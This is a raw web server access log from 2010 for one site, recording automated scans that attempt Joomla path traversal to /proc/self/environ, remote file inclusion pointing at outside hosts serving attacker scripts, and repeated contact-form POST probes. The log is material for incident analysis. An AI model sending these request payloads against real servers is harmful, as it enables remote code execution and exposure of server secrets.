93.89.16.80 - - [31/Jul/2010:06:31:15 -0700] "GET ////index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.805" "www.puaga.com"
93.89.16.80 - - [31/Jul/2010:06:31:15 -0700] "GET /logs/////index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
93.89.16.80 - - [31/Jul/2010:06:31:59 -0700] "GET /logs/access_100625.log/////index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
174.142.75.205 - - [31/Jul/2010:06:32:32 -0700] "GET /logs/access_100408.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.bangkoklimo4u.com/image_post/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
174.142.75.205 - - [31/Jul/2010:06:32:32 -0700] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.bangkoklimo4u.com/image_post/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
174.142.75.205 - - [31/Jul/2010:06:32:32 -0700] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.bangkoklimo4u.com/image_post/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
174.142.75.205 - - [31/Jul/2010:06:32:54 -0700] "GET /logs/access_100509.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.bangkoklimo4u.com/image_post/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
66.135.42.56 - - [31/Jul/2010:06:33:03 -0700] "POST /logs/access_100719.log%20%20/contact.php HTTP/1.1" 404 5258 "-" "kmccrew Bot Search" "www.puaga.com"
66.135.42.56 - - [31/Jul/2010:06:33:03 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "kmccrew Bot Search" "www.puaga.com"
66.135.42.56 - - [31/Jul/2010:06:33:03 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "kmccrew Bot Search" "www.puaga.com"
66.135.42.56 - - [31/Jul/2010:06:33:03 -0700] "POST /logs/access_100719.log%20%20/contact.php HTTP/1.1" 404 5258 "-" "kmccrew Bot Search" "www.puaga.com"
66.135.42.56 - - [31/Jul/2010:06:33:03 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "kmccrew Bot Search" "www.puaga.com"
66.135.42.56 - - [31/Jul/2010:06:33:03 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "kmccrew Bot Search" "www.puaga.com"
66.135.42.56 - - [31/Jul/2010:06:33:03 -0700] "POST /logs/access_100719.log%20%20/contact.php HTTP/1.1" 404 5258 "-" "kmccrew Bot Search" "www.puaga.com"
66.135.42.56 - - [31/Jul/2010:06:33:03 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "kmccrew Bot Search" "www.puaga.com"
66.135.42.56 - - [31/Jul/2010:06:33:03 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "kmccrew Bot Search" "www.puaga.com"
66.135.42.56 - - [31/Jul/2010:06:33:03 -0700] "POST /logs/access_100719.log%20%20/contact.php HTTP/1.1" 404 5258 "-" "kmccrew Bot Search" "www.puaga.com"
66.135.42.56 - - [31/Jul/2010:06:33:03 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "kmccrew Bot Search" "www.puaga.com"
66.135.42.56 - - [31/Jul/2010:06:33:03 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "kmccrew Bot Search" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:06:33:05 -0700] "POST /contact.php HTTP/1.0" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:06:33:05 -0700] "POST /logs//contact.php HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:06:33:07 -0700] "POST /logs/access_100624.log%20%20//contact.php HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.puaga.com"
188.165.213.8 - - [31/Jul/2010:06:34:17 -0700] "GET /logs/access_100705.log////index.php?option=com_mediqna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
188.165.213.8 - - [31/Jul/2010:06:34:18 -0700] "GET ///index.php?option=com_mediqna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.803" "www.puaga.com"
188.165.213.8 - - [31/Jul/2010:06:34:18 -0700] "GET /logs////index.php?option=com_mediqna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
213.171.37.206 - - [31/Jul/2010:06:34:23 -0700] "GET /logs/access_100215.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.bangkoklimo4u.com/image_post/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
213.171.37.206 - - [31/Jul/2010:06:34:23 -0700] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.bangkoklimo4u.com/image_post/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
213.171.37.206 - - [31/Jul/2010:06:34:23 -0700] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.bangkoklimo4u.com/image_post/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
66.135.42.56 - - [31/Jul/2010:06:34:30 -0700] "POST /logs/access_100712.log%20%20/contact.php HTTP/1.1" 404 5258 "-" "kmccrew Bot Search" "www.puaga.com"
66.135.42.56 - - [31/Jul/2010:06:34:30 -0700] "POST /logs/access_100712.log%20%20/contact.php HTTP/1.1" 404 5258 "-" "kmccrew Bot Search" "www.puaga.com"
66.135.42.56 - - [31/Jul/2010:06:34:31 -0700] "POST /logs/access_100712.log%20%20/contact.php HTTP/1.1" 404 5258 "-" "kmccrew Bot Search" "www.puaga.com"
66.135.42.56 - - [31/Jul/2010:06:34:31 -0700] "POST /logs/access_100712.log%20%20/contact.php HTTP/1.1" 404 5258 "-" "kmccrew Bot Search" "www.puaga.com"
91.201.66.120 - - [31/Jul/2010:06:34:36 -0700] "GET /logs/access_100407.log HTTP/1.1" 200 1302739 "http://www.puaga.com/logs/access_100407.log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:06:34:51 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "plaNETWORK Bot Search" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:06:34:52 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "plaNETWORK Bot Search" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:06:34:52 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "plaNETWORK Bot Search" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:06:34:52 -0700] "POST /logs/access_100516.log%20%20/contact.php HTTP/1.1" 404 5258 "-" "plaNETWORK Bot Search" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:06:34:52 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "plaNETWORK Bot Search" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:06:34:52 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "plaNETWORK Bot Search" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:06:34:52 -0700] "POST /logs/access_100516.log%20%20/contact.php HTTP/1.1" 404 5258 "-" "plaNETWORK Bot Search" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:06:34:53 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "plaNETWORK Bot Search" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:06:34:53 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "plaNETWORK Bot Search" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:06:34:53 -0700] "POST /logs/access_100516.log%20%20/contact.php HTTP/1.1" 404 5258 "-" "plaNETWORK Bot Search" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:06:34:54 -0700] "POST /logs/access_100516.log%20%20/contact.php HTTP/1.1" 404 5258 "-" "plaNETWORK Bot Search" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:06:34:54 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "plaNETWORK Bot Search" "www.puaga.com"
188.165.213.8 - - [31/Jul/2010:06:34:58 -0700] "GET /logs/access_100701.log////index.php?option=com_mediqna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
174.142.75.205 - - [31/Jul/2010:06:35:20 -0700] "GET /logs/access_100408.log%20//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.bangkoklimo4u.com/image_post/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
91.121.144.61 - - [31/Jul/2010:06:36:00 -0700] "GET /index.php?option=&mosConfig.absolute.path=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 200 3640 "-" "libwww-perl/5.803" "www.puaga.com"
195.5.163.207 - - [31/Jul/2010:06:36:18 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.puaga.com"
195.5.163.207 - - [31/Jul/2010:06:36:19 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.puaga.com"
217.65.2.151 - - [31/Jul/2010:06:36:21 -0700] "GET /index.php?option=&mosConfig.absolute.path=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 200 3640 "-" "libwww-perl/5.836" "www.puaga.com"
84.217.73.155 - - [31/Jul/2010:06:36:52 -0700] "GET /index.php?option=&mosConfig.absolute.path=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 200 3640 "-" "libwww-perl/5.79" "www.puaga.com"
216.104.37.106 - - [31/Jul/2010:06:38:11 -0700] "GET /logs/access_100525.log////index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
216.104.37.106 - - [31/Jul/2010:06:38:11 -0700] "GET ///index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.810" "www.puaga.com"
216.104.37.106 - - [31/Jul/2010:06:38:11 -0700] "GET /logs////index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
110.138.208.125 - - [31/Jul/2010:06:38:30 -0700] "GET /logs/access_100603.log/modules/My_eGallery/index.php?basepath=http://kunki.org/1/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.104.37.106 - - [31/Jul/2010:06:39:26 -0700] "GET /logs/access_100616.log////index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:06:40:04 -0700] "POST /logs/access_100426.log%20%20/contact.php HTTP/1.1" 404 5258 "-" "plaNETWORK Bot Search" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:06:40:05 -0700] "POST /logs/access_100426.log%20%20/contact.php HTTP/1.1" 404 5258 "-" "plaNETWORK Bot Search" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:06:40:06 -0700] "POST /logs/access_100426.log%20%20/contact.php HTTP/1.1" 404 5258 "-" "plaNETWORK Bot Search" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:06:40:06 -0700] "POST /logs/access_100426.log%20%20/contact.php HTTP/1.1" 404 5258 "-" "plaNETWORK Bot Search" "www.puaga.com"
94.23.8.200 - - [31/Jul/2010:06:42:23 -0700] "GET /logs/access_100709.log%20%20//?_PHPLIB[libdir]=http://www.net-games.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.23.8.200 - - [31/Jul/2010:06:42:23 -0700] "GET /logs//?_PHPLIB[libdir]=http://www.net-games.it/open.txt??? HTTP/1.1" 200 25682 "-" "Mozilla/5.0" "www.puaga.com"
94.23.8.200 - - [31/Jul/2010:06:42:24 -0700] "GET /?_PHPLIB[libdir]=http://www.net-games.it/open.txt??? HTTP/1.1" 200 3640 "-" "Mozilla/5.0" "www.puaga.com"
195.5.163.207 - - [31/Jul/2010:06:42:48 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.puaga.com"
110.138.208.125 - - [31/Jul/2010:06:42:56 -0700] "GET /logs/access_100504.log/modules/My_eGallery/index.php?basepath=http://kunki.org/1/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.23.8.200 - - [31/Jul/2010:06:43:12 -0700] "GET /logs/access_100509.log%20%20//?_PHPLIB[libdir]=http://www.net-games.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.52.166.12 - - [31/Jul/2010:06:45:02 -0700] "GET /////?mosConfig_absolute_path=http://www.ulster.irishhome.net/archive/ID-RFI.txt?? HTTP/1.1" 200 3640 "-" "libwww-perl/5.803" "www.puaga.com"
212.52.166.12 - - [31/Jul/2010:06:45:03 -0700] "GET /////?mosConfig_absolute_path=http://www.ulster.irishhome.net/archive/ID-RFI.txt?? HTTP/1.1" 200 3640 "-" "libwww-perl/5.803" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:06:45:47 -0700] "POST /logs/access_100324.log/contact.php HTTP/1.1" 404 5258 "-" "plaNETWORK Bot Search" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:06:45:47 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "plaNETWORK Bot Search" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:06:45:47 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "plaNETWORK Bot Search" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:06:45:48 -0700] "POST /logs/access_100324.log/contact.php HTTP/1.1" 404 5258 "-" "plaNETWORK Bot Search" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:06:45:48 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "plaNETWORK Bot Search" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:06:45:48 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "plaNETWORK Bot Search" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:06:45:48 -0700] "POST /logs/access_100324.log/contact.php HTTP/1.1" 404 5258 "-" "plaNETWORK Bot Search" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:06:45:48 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "plaNETWORK Bot Search" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:06:45:48 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "plaNETWORK Bot Search" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:06:45:49 -0700] "POST /logs/access_100324.log/contact.php HTTP/1.1" 404 5258 "-" "plaNETWORK Bot Search" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:06:45:49 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "plaNETWORK Bot Search" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:06:45:49 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "plaNETWORK Bot Search" "www.puaga.com"
216.17.105.143 - - [31/Jul/2010:06:46:06 -0700] "POST /logs/access_100712.log%20%20/contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
216.17.105.143 - - [31/Jul/2010:06:46:06 -0700] "POST /contact.php HTTP/1.0" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
216.17.105.143 - - [31/Jul/2010:06:46:06 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
216.17.105.143 - - [31/Jul/2010:06:46:06 -0700] "POST /logs/access_100712.log%20%20/contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
216.17.105.143 - - [31/Jul/2010:06:46:06 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
216.17.105.143 - - [31/Jul/2010:06:46:06 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
216.17.105.143 - - [31/Jul/2010:06:46:07 -0700] "POST /logs/access_100712.log%20%20/contact.php HTTP/1.0" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
216.17.105.143 - - [31/Jul/2010:06:46:07 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
216.17.105.143 - - [31/Jul/2010:06:46:07 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
216.17.105.143 - - [31/Jul/2010:06:46:07 -0700] "POST /logs/access_100712.log%20%20/contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
216.17.105.143 - - [31/Jul/2010:06:46:07 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
216.17.105.143 - - [31/Jul/2010:06:46:07 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
216.17.105.143 - - [31/Jul/2010:06:46:07 -0700] "POST /logs/access_100712.log/contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
216.17.105.143 - - [31/Jul/2010:06:46:07 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
216.17.105.143 - - [31/Jul/2010:06:46:07 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
216.17.105.143 - - [31/Jul/2010:06:46:07 -0700] "POST /logs/access_100712.log%20%20/contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
216.17.105.143 - - [31/Jul/2010:06:46:07 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
216.17.105.143 - - [31/Jul/2010:06:46:07 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
216.17.105.143 - - [31/Jul/2010:06:46:07 -0700] "POST /logs/access_100712.log%20%20/contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
216.17.105.143 - - [31/Jul/2010:06:46:07 -0700] "POST /logs/contact.php HTTP/1.0" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
216.17.105.143 - - [31/Jul/2010:06:46:07 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
216.17.105.143 - - [31/Jul/2010:06:46:08 -0700] "POST /logs/access_100712.log%20%20/contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
216.17.105.143 - - [31/Jul/2010:06:46:08 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
216.17.105.143 - - [31/Jul/2010:06:46:08 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
216.17.105.143 - - [31/Jul/2010:06:46:08 -0700] "POST /logs/access_100712.log/contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
216.17.105.143 - - [31/Jul/2010:06:46:08 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
216.17.105.143 - - [31/Jul/2010:06:46:08 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
216.17.105.143 - - [31/Jul/2010:06:46:08 -0700] "POST /logs/access_100712.log/contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
216.17.105.143 - - [31/Jul/2010:06:46:08 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
216.17.105.143 - - [31/Jul/2010:06:46:08 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
216.17.105.143 - - [31/Jul/2010:06:46:08 -0700] "POST /logs/access_100712.log/contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
216.17.105.143 - - [31/Jul/2010:06:46:08 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
216.17.105.143 - - [31/Jul/2010:06:46:09 -0700] "POST /logs/access_100712.log/contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
216.17.105.143 - - [31/Jul/2010:06:46:09 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
216.17.105.143 - - [31/Jul/2010:06:46:09 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
216.17.105.143 - - [31/Jul/2010:06:46:09 -0700] "POST /logs/access_100712.log/contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
216.17.105.143 - - [31/Jul/2010:06:46:09 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
216.17.105.143 - - [31/Jul/2010:06:46:09 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
216.17.105.143 - - [31/Jul/2010:06:46:09 -0700] "POST /logs/access_100712.log/contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
216.17.105.143 - - [31/Jul/2010:06:46:09 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
216.17.105.143 - - [31/Jul/2010:06:46:09 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
216.17.105.143 - - [31/Jul/2010:06:46:09 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
64.202.247.2 - - [31/Jul/2010:06:46:39 -0700] "POST /logs/access_100704.log/contact.php HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.puaga.com"
62.182.63.25 - - [31/Jul/2010:06:47:08 -0700] "GET /logs/access_100701.log/////index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
62.182.63.25 - - [31/Jul/2010:06:47:09 -0700] "GET ////index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 2875 "-" "libwww-perl/5.805" "www.puaga.com"
62.182.63.25 - - [31/Jul/2010:06:47:09 -0700] "GET /logs/////index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
110.138.208.125 - - [31/Jul/2010:06:47:33 -0700] "GET /logs/access_100603.log/modules/My_eGallery/index.php?basepath=http://kunki.org/1/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.105.143 - - [31/Jul/2010:06:47:36 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
216.17.105.143 - - [31/Jul/2010:06:47:36 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
216.17.105.143 - - [31/Jul/2010:06:47:36 -0700] "POST /logs/access_100712.log/contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
216.17.105.143 - - [31/Jul/2010:06:47:37 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
216.17.105.143 - - [31/Jul/2010:06:47:37 -0700] "POST /logs/contact.php HTTP/1.0" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
216.17.105.143 - - [31/Jul/2010:06:47:37 -0700] "POST /logs/access_100712.log/contact.php HTTP/1.0" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
216.17.105.143 - - [31/Jul/2010:06:47:37 -0700] "POST /logs/access_100712.log/contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
216.17.105.143 - - [31/Jul/2010:06:47:37 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
216.17.105.143 - - [31/Jul/2010:06:47:37 -0700] "POST /contact.php HTTP/1.0" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
216.17.105.143 - - [31/Jul/2010:06:47:37 -0700] "POST /logs/access_100712.log/contact.php HTTP/1.0" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
216.17.105.143 - - [31/Jul/2010:06:47:37 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
216.17.105.143 - - [31/Jul/2010:06:47:37 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
216.17.105.143 - - [31/Jul/2010:06:47:37 -0700] "POST /logs/access_100712.log/contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
216.17.105.143 - - [31/Jul/2010:06:47:37 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
216.17.105.143 - - [31/Jul/2010:06:47:37 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
216.17.105.143 - - [31/Jul/2010:06:47:38 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
216.17.105.143 - - [31/Jul/2010:06:47:38 -0700] "POST /logs/access_100712.log/contact.php HTTP/1.0" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
216.17.105.143 - - [31/Jul/2010:06:47:38 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
216.17.105.143 - - [31/Jul/2010:06:47:38 -0700] "POST /logs/access_100712.log/contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
